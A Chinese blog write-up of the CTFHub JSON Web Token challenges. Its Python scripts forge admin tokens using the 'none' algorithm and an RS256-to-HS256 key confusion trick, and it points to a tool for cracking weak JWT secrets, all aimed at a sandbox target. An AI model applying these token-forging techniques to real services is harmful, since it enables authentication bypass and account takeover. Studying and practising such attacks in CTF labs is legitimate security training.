ctfhub web技能树进阶JSON Web Token

最新推荐文章于 2024-08-22 08:30:00 发布
最新推荐文章于 2024-08-22 08:30:00 发布
阅读量522 收藏 10
点赞数 6
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hcja666/article/details/139203613
版权

目录

基础知识

打开题目附件学习jwt基础知识后,将附件中的flag提交就可以了。

敏感信息泄露

进入登陆界面,随便登陆进去,进去后抓包把cookie里面的jwt编码拿去解码,里面有flag,把那两半拼起来即可。

无签名

登进去后把cookie的jwt解码,里面的role的值改为admin,python写程序无签名加密

import jwt

payload = {
    "username": "admin",
    "password": "password",
    "role": "admin"
}

header = {
    "typ": "JWT",
    "alg": "none"
}

jwt_token = jwt.encode(payload, None, headers=header)

print(jwt_token)

将新的jwt发包即可。

弱密钥

https://gitcode.com/brendan-rius/c-jwt-cracker/工具爆破密钥,然后role等于admin
在这里插入图片描述每个人的密钥不一样。

在这里插入图片描述

修改签名算法

题目提示:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。
RS256改HS256
用了大佬的脚本,并且加了几句,直接把公钥爬下来。这里公钥必须下载不能直接复制粘贴,因为我试过很多次。

# coding=GBK
import hmac
import hashlib
import base64
import requests
url="http://challenge-0b5624c584528cee.sandbox.ctfhub.com:10800/publickey.pem"
r=requests.get(url)
with open("publickey.pem","wb") as f:
    f.write(r.content)

file = open('publickey.pem')  # 需要将文中的publickey下载	与脚本同目录
key = file.read()

# Paste your header and payload here
header = '{"typ": "JWT", "alg": "HS256"}'
payload = '{"username": "admin", "role": "admin"}'

# Creating encoded header
encodeHBytes = base64.urlsafe_b64encode(header.encode("utf-8"))
encodeHeader = str(encodeHBytes, "utf-8").rstrip("=")

# Creating encoded payload
encodePBytes = base64.urlsafe_b64encode(payload.encode("utf-8"))
encodePayload = str(encodePBytes, "utf-8").rstrip("=")

# Concatenating header and payload
token = (encodeHeader + "." + encodePayload)

# Creating signature
sig = base64.urlsafe_b64encode(hmac.new(bytes(key, "UTF-8"), token.encode("utf-8"), hashlib.sha256).digest()).decode(
    "UTF-8").rstrip("=")

print(token + "." + sig)

在这里插入图片描述
ok

参考文章:
1.https://blog.csdn.net/devil8123665/article/details/113030554

hcja666
关注
ctfhub 技能树 JSON Web Token 修改签名算法
devil8123665的博客
01-23 6866
1、题目提示:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。 2、打开题目看到题目给的源码,源码如下, <?php require __DIR__ . '/vendor/autoload.php'; use \Firebase\JWT\JWT; ​ class JWTHelper { public static function encode($pay
CTFHub技能树
weixin_59480274的博客
04-23 5456
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2373
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTFHub~JWT漏洞靶场最详细教程
weixin_67832625的博客
08-21 1279
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can
CTFHUB--JSON Web Token
qq_49422880的博客
06-07 2123
基础知识 链接: 官方解释.   什么是JWT Json Web Token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准(RFC 7519。 该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景,是目前最流行的跨域认证解决方案。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。 JWT 的原理 服务器认
ctfhub JSON Web Token
CN天狼
04-01 2314
ctfhub JSON Web Token
ctfhub 技能树 ——JSON Web Token 弱密钥
m0_62879498的博客
04-01 2078
ctfhub 技能树 ——JSON Web Token 弱秘钥 如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag 和 JSON Web Token 无签名一样,我们使用 admin 和 123456 进行登录查看 发现,和上一关的登录界面相似 我们 使用 Burip suite 进行抓包查看 本关和上一关不同的是 本关不能使用 none算法 换句话说我们需要知道签名的密匙,在关卡一开始就提示我们:JWT采用对称加密算法,并且密钥的强度较
单点登录中的JSON WEB TOKEN的使用方法C#版
03-21
Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。本实例还原了整个的使用流程。建议...
JWTJSON Web Token):JWT的常见问题与解决方案.docx
最新发布
08-28
JWTJSON Web Token):JWT的常见问题与解决方案.docx
ASP.NET Core Web API之Token验证
06-26
ASP.NET Core Web API采用Token进行身份验证。...主要技术:ASP.NET Core Web API , JWT , Json web token 包括获取TokenToken验证,生成Token等内容 具体可参考个人文章【ASP.NET Core Web API之Token验证】
CTFHUB技能树——web
qq_63980959的博客
04-20 7133
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
CTFHUB | web进阶 | JSON Web Token | 弱密钥
weixin_68416970的博客
08-22 171
CTFHUB | web进阶 | JSON Web Token | 弱密钥的教程
CTFHub-Web进阶-JWT练习
Atkx's Blog
07-25 3564
什么是JWTJWT的结构CTFHub-Web-JWT练习敏感信息泄露 什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。 JWT的结构 .
CTFHUB JWT(Json Web Token)
weixin_63231007的博客
11-04 2268
然后看到decode函数这里它本质上使用的还是JWT上的编码的方法,使用的的KEY值是PUBLIC_KEY,也就是题目给出的提示公钥,发现在 JWTHelper类中,decode()、encode()默认的加密解密方式都为“HS256”根据这个条件我们需要编写一个python代码来生成tokenJWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
ctf-hub web进阶(JWT)
h0ld1rs的博客
10-19 1988
敏感信息泄露 http://jwt.io 使用这个网站,把token进行加载即可 然后两部分拼接即可 无签名 none时侯,一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证 import jwt token = jwt.encode( { "username": "admin", "password": "admin", "role":"admin" }, algorithm="none",key="" ) print(token) 最后可以得到 e
CTFHUB | web进阶 | JSON Web Token | 无签名
weixin_68416970的博客
08-21 616
CTFHUB | web进阶 | JSON Web Token | 无签名的详细通关教程
CTFHub-JSON Web Token-无签名
feng的博客
09-16 1755
首先进入环境,发现是一个登录界面。我们随便输入个admin和1试试: 说明我们必须要伪造admin的身份。这里进行抓包,发现了JWT: 我们对JWT进行解码看看,发现header是这样: payload是这样: 如果解码的最后面不对,可以添加等于号。因为JWT采取的是base6url编码,如果有等于号会被省略。 根据题目的提示:一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证。尝试找到 flag。因此我们可以尝试使用none算法,然后将payload里面的g
ctfhub技能树web基础认证
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能树来帮助学习者提升Web基础认证的能力。下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET、POST等),了解HTTP请求和响应的结构。 2. URL编码和解码:学习URL编码和解码的原理和常见的编码方式,如URL编码中的%20代表空格。 3. Cookies:了解Cookies的作用和原理,学习如何使用Cookies进行用户认证和状态管理。 4. Session管理:学习Session的概念和原理,了解如何使用Session进行用户认证和状态管理。 5. 基本认证(Basic Authentication):学习基本认证的原理和流程,了解如何使用用户名和密码进行认证。 6. 表单认证(Form-based Authentication):学习表单认证的原理和流程,了解如何使用表单提交用户名和密码进行认证。 7. Token认证:学习Token认证的原理和流程,了解如何使用Token进行用户认证和状态管理。 8. CSRF攻击与防御:学习CSRF(Cross-Site Request Forgery)攻击的原理和常见的防御措施9. XSS攻击与防御:学习XSS(Cross-Site Scripting)攻击的原理和常见的防御措施10. SQL注入攻击与防御:学习SQL注入攻击的原理和常见的防御措施。 以上是CTFHub技能树中关于Web基础认证的内容,通过学习这些知识,你可以提升自己在Web安全领域的认证技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值